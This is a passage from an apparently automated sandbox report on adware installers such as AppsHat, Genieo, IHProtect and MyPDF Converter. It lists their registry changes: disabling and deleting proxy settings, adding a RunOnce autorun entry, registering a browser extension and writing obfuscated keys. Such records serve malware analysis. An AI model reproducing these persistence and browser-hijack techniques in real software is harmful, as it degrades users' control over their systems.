"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"
The process smt_mystartsearch.exe:3356 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "3D 95 9D 8F 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\31ec1c24\PUPautoinsaller_v1.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\31ec1c24\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\6c88b866\python.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\6c88b866\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\biclient.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\422.json,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "E0 D1 59 A4 8E 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process trayapp_setup.gen:1992 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Genieo\Components\TrayApp\Personalization Tray Application\Components]
"Main" = "1"
[HKCU\Software\Genieo\Components\TrayApp\Personalization Tray Application]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application"
The process ProtectService.exe:3120 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Wow6432Node\IHProtect]
"ptid" = "smt"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"
The process ProtectService.exe:3188 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
"AutoConfigURL"
"ProxyServer"
The process Setup.exe:4008 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\GPL Ghostscript\8.15]
"GS_DLL" = "%Program Files% (x86)\GPLGS\gsdll32.dll"
"GS_LIB" = "%Program Files% (x86)\GPLGS"
The process Setup.exe:468 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPDF Converter]
"UninstallString" = "%Program Files% (x86)\MyPDFConverter\unInstpw64.exe /uninstall"
[HKLM\SOFTWARE\CUSTPDF Writer\CPWPU899:]
"Destination Folder" = "%Program Files% (x86)\MyPDFConverter"
[HKLM\SOFTWARE\CUSTPDF Writer]
"Port Name" = "CPWPU899:"
"Destination Folder" = "%Program Files% (x86)\MyPDFConverter"
[HKLM\SOFTWARE\CUSTPDF Writer\CPWPU899:]
"Converter" = "%Program Files% (x86)\MyPDFConverter\GNUGS"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPDF Converter]
"DisplayName" = "MyPDF Converter"
[HKLM\SOFTWARE\CUSTPDF Writer]
"Printer Name" = "MyPDF Converter"
"Programmatic Access" = "0"
[HKCU\Printers\DevModes2]
"MyPDF Converter" = "4D 00 79 00 50 00 44 00 46 00 20 00 43 00 6F 00"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\CUSTPDF Writer]
"Arguments"
"Port Name"
"Destination Folder"
"Command"
"Printer Name"
"Programmatic Access"
The process TPAutoConnSvc.exe:1844 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\ThinPrint\TPPrnUI\HP LaserJet Professional M1212nf MFP#:3]
"TrayData" = "2,Tray 3, 3,Tray 2, 1,Tray 1, 4,Manual Feed, 7,Auto Select"
"FormData" = "1,2159,2794,Letter¶40,40,2086,2712, 5,2159,3556,Legal¶40,40,2086,3474, 9,2100,2970,A4¶39,39,2032,2890, 7,1842,2667,Executive¶40,40,1761,2585, 258,2159,3302,8.5 x 13 (custom)¶40,40,2086,3220, 11,1480,2100,A5¶39,39,1408,2020, 70,1050,1480,A6¶39,39,975,1399, 13,1820,2570,B5 (JIS)¶39,39,1747,2490, 264,1950,2700,16K 195x270¶39,39,1882,2620, 263,1840,2600,16K 184x260¶39,39,1761,2520, 257,1970,2730,16K 197x273¶39,39,1896,2650, 43,1000,1480,Japanese Postcard¶39,39,921,1399, 82,1480,2000,Double Japan Postcard Rotated¶39,39,1408,1919, 20,1046,2413,Envelope #10¶40,40,975,2331, 37,983,1905,Envelope Monarch¶40,40,907,1823, 34,1760,2500,Envelope B5¶39,39,1693,2420, 28,1620,2290,Envelope C5¶39,39,1544,2209, 27,1100,2200,Envelope DL¶39,39,1029,2120"
"DelAfterCreate" = "1"
[HKU\.DEFAULT\Printers\DevModes2]
"HP LaserJet Professional M1212nf MFP#:3" = "48 00 50 00 20 00 4C 00 61 00 73 00 65 00 72 00"
The Application deletes the following registry key(s):
[HKLM\SOFTWARE\ThinPrint\TPPrnUI\HP LaserJet Professional M1212nf MFP#:3]
The process appshat.exe:4072 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286]
"65743" = "Apps Hat 1.5"
[HKCU\Software\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "11 F7 16 DC 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKLM\SOFTWARE\InstalledBrowserExtensions\25286]
"65743" = "Apps Hat 1.5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "3B D2 61 E8 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 44 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\InstalledBrowserExtensions\25286]
"65743" = "Apps Hat 1.5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\SOFTWARE\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process biclient.exe:2452 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1337851866"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "3D 95 9D 8F 8E 3B D0 01"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "biclient.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
"WpadDecision" = "0"
"WpadNetworkName" = "Network"
"WpadDecisionTime" = "3D 95 9D 8F 8E 3B D0 01"
To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce]
"mypdfconverterfr" = ""
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
The process 11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe:3456 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\App Lid\R25klOVl4E cJzVfU8JcXpd6qA3Rb09kTiS67GUpxImXDvOpaXj6 JR4M30hrCjpoFQ1/cvtFyyoAK0PIvCLgq59mJ8e4oPe9XNYWHfu2xUmUVl/k9u9rZ8FbTNySb2Ei9TamgPzhbT/BvQNp2I6slrPGqRJuy9T4n3csTBG6nk=]
"a5/bwHFtAjucryzHy7MmxBoouBciRo0d82620cT6kn9nKanE7G6eC8XPdvClWFG14Coluj8X8A0Uepue7 4YugA20c3Lq52kHfvucxXEOeLij8Q0klRLNsmol3/DOtNd2dfjAaAz56fNF/7OLH hMcrbtICIAie hX5GdowoLbg=" = "1"
[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"
[HKLM\SOFTWARE\Wow6432Node\App Lid\IeHfrFTsSpk9WFTBVM/OjJCXPrm4m6sFugaWEWgKjoT6TUE8xv5h9dl13enbQz7dDSKyXcapJhcROrJjcZbUB VM0qtJWcSmfKHt5IUboACP9IuGX1nuVXn6hHaE4hkxZWGgl82Mnf5z24UN4WeozyvBPQaY4soTNeW4F/9REcA=]
"n8EfoHgcD3cXhpWeFdPjZVARnV8qmJCuYBRONKgg9 8cuJUu6a6yclXEWo5rmaHcdyX7TJ4yQeddyS2LTXrR1eCQtHVAVd7t r2NtJvRtxPWFkhu8 gM3fg47Pro/3YXxOrsQlUlGSMmVfBUkdmJCXi0eEgE1OG5azRyjbuC Ow=" = "1"
The Application deletes the following registry key(s):
[HKLM\SOFTWARE\Wow6432Node\Tempo]
The process powershell.exe:976 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
"LanguageList" = "en-US, en"
The process powershell.exe:1020 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
"LanguageList" = "en-US, en"
The process powershell.exe:3596 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
"LanguageList" = "en-US, en"
The process appshat_generic.exe:108 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe"
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"DisplayName" = "AppsHat Mobile Apps"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"Publisher" = "Somoto Ltd."
"DisplayVersion" = "1.0.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionTime" = "11 F7 16 DC 8E 3B D0 01"
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\Uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "2A 7A C9 E7 8E 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process gentray.exe:2824 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "3E 76 5F 11 8F 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 50 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "95 C7 95 33 8F 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process gentray.exe:3260 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "74 FE 43 07 8F 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4E 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "10 8B 75 0B 8F 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process gentray.exe:1556 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "FF D6 24 48 8F 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 53 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "06 02 3F 53 8F 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
